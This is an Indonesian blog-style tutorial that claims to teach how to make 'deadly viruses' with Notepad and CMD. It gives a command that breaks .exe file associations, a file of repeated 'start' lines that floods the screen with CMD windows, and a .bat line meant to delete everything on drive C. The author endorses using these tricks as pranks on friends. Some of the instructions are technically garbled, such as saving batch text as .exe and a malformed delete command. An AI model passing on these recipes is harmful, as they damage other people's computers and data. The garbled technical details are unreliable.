Cara Membuat Virus Mematikan Menggunakan Notepad dan CMD

Ketika hendak menulis artikel tentang cara membuat virus mematikan pada komputer atau laptop berikut ini. Saya cukup geli sendiri. Mengapa harus ada orang yang membuat virus. Padahal itu kan menyakiti orang lain. Terlebih juga bisa merusak perangkat kawan sendiri.

Tapi ya bagaimana lagi, terkadang banyak orang iseng yang ingin membuktikan betapa pintarnya di menyakiti orang lain. Dan konyolnya, itu diaplikasikan dengan membuat virus. Tentu ketika saya menulis artikel ini, bukan itu niatan saya. Saya berniat kamu-kamu tahu bagaimana cara membuat virus mematikan biar kamu-kamu juga tau gimana bahaya dan cara mengatasinya.

Sangsung saja, cara membuat virus berikut intinya adalah dengan menggunakan notepad dan CMD. Itupun harus ditambah syarat satu lagi, hasil buatanya harus diklik. Alias dijalankan. Kalau tidak dijalankan ya tetap saja.virus yang dibuat akan terkarantina dalam file. Oke, mari kita mulai:

  1. Buat program dan aplikasi .exe tidak berjalan – pakai cmd

Silakan bukan program CMD. Caranya klik start cari atau tulis run, lalu ketik cmd. Enter dan muncul. Atau kamu juga bisa buka cmd dengan menekan key windows+R kemudian ketik cmd. Enter, maka cmd akan terbuka. Begitu cmd terbuka, ketik saja ASSOC.exe=.hank setelah itu tekan enter. Lansung dah, seluruh aplikasi atau program dengan ekstensi .exe tidak akan bisa dibuka.

Untuk menghilangkan virus semacam ini gampang kawan, tinggal bukan cmd lagi saja. caranya seperti yang di atas ya. Kemudian ketik ASSOC.exe=EXEFILE pada cmd yang terbuka tadi. Lalu tekan enter. Dengan begitu, aplikasi atau program dengan eksintensi .exe kembali normal.

Trik ini hanya untuk sekadar iseng saja sebenarnya. Sekali-kali bikin kawan jengkel boleh lah.

  1. Buat Virus – pakai Notepad

Cara membuat virus yang mematikan berikutnya adalah dengan menggunakan Notepad. Langkah pertama yang harus kawan lakukan, silakan bukan notepad terlebih dahulu. Cara bukanya tergantung kawan pakai windows berapa. Tapi sederhanaya, tekan start lalu ketik notepad, pasti muncul program itu. Lalu enter. Begitu sudah masuk di notepad, silakan ketik:

start

start

start

start

start

start

start

start

start

start

start

start

——

Kalau sudah, silakan simpan notepad tersebut dimana saja dengan nama apa saja. suka-suka kamu. Yang penting eksistensinya menggunakan .exe, misalnya cinta.exe kemudian ganti Save As Type nya menjadi All files.

Trik ini sebenarnya tidak berbahaya, tetapi menjadi mematikan begitu kawan kamu tak mengerti. Sebab bakal dikira kena virus dan instal ulang. Padahal trik ini hanya akan menyebabkan komputer membukan cmd dengan jumlah banyak, begitu file bernama cinta.exe dibuka.

  1. Menghapus seluruh file C

Cara berikutnya benar-benar berbahaya dan berakibat fatal ya kawan. Jadi untuk yang ini cukup diketahui saja ya, jangan diaplikasikan pada komputer sendiri atau komputer orang lain. sebab akibatnya bisa menghilangkan seluruh data yang ada di drive c. Bahkan fatalnya sistem komputer yang kena virus ini bisa korup.

Cara untuk membuatnya dimulai dengan membuka Notepad. Caranya seperti di atas. Kemudian kalau sudah, silakan copi paste kode berikut:

@Echo offDel C: *.* |y

Lalu simpan file tersebut dimana saja dan dengan nama apa saja. asalakan dibelakangnya diberi eksistensib .BAT, misalnya cinta.bat. Begitu file tersebut dibuka, hasilnya akan sangat fatal.

Nah itulah beberapa cara membuat virus mematikan yang bisa kawan pelajari. Sekali lagi, iseng boleh asal bisa bertanggungjawab dan tidak keterlaluan. Semoga menyenangkan.